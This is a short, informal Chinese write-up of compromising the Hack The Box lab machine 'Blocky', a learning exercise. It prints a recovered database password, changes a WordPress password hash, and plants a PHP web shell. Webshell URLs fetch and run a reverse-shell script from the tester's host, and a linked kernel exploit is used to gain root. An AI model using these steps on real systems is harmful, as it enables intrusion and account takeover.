• URL : https://app.hackthebox.eu/machines/48
• IP : 10.129.1.53

Recon

• Rustscan
  • 
• Nmap
  • 
• 觀察首頁
  • 
  • 
  • 看起來是 WordPress
• 掃目錄
  • https://www.exploit-db.com/exploits/46676
  • phpmyadmin
  • plugins
• PHPmyadmin
  • 
  • 
  • Version 4.5.4.1
  • 
  • 有 Exploit
    • https://www.exploit-db.com/exploits/40185
      • 要帳密
• 繼續觀察
  • 
  • 他有一個 Wiki
  • 
  • 其實剛剛 dirsearch 就有看到

WordPress

• 觀察 WordPress 使用者
  • http://10.129.1.53/index.php/?author=1
  • notch
  • 
  • 
• 嘗試登入 /wp-admin
  • 
• 觀察目錄 /plugins
  • plugins
  • 
  • 裡面有兩個檔案
  • 感覺 BlockyCore.jar 是它們自己寫的

Reverse

• 用 r2 觀察
  • 
• 算ㄌ還是不要裝逼，乖乖用 jd-gui 笑死
  • 
• 找到 db 帳密
  • root
  • 8YsqfCTnvxAUeduzjNSXe22

PHP My admin

• 用帳密登入後找到 WordPress 使用者頁面
  • 
  • 備份原本使用者的 hash 以備不時之需
  • $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/
• 把 hash 修改成 12345 的 md5
  • 827ccb0eea8a706c4c34a16891f84e7b
  • 

登入 WordPress

• 用帳號 notch 密碼 12345 登入
  • 
• 在 plugin 中增加 php web shell
  • 
• 確認 webshell 可用
  • 
• 下載 reverse shell
  • http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=wget%2010.10.16.35:8000/s_HTB
• 執行 webshell
  • http://10.129.1.53/wp-content/plugins/akismet/akismet.php?A=bash%20s_HTB

Reverse shell

• 
• spawn shell
  • python3 -c 'import pty; pty.spawn("/bin/bash")'

提權

• 跑 Linpeas
  • 
  • 發現可以 Kernel Exploit
  • https://github.com/rlarabee/exploits/tree/master/cve-2017-16995
• 編譯並丟過去
  • https://raw.githubusercontent.com/rlarabee/exploits/master/cve-2017-16995/cve-2017-16995.c
  • 
• 取得 Flag
  • User
    • 
    • 59fee0977fb60b8a0bc6e41e751f3cd5
  • Root
    • 
    • 0a9694a5b4d272c694679f7860f1cd5f
• 看了一下正規解
  • 貌似可以直接用 SQL 密碼 SSH 登入
  • 然後 sudo su 就結束ㄌ
  • ㄏㄏ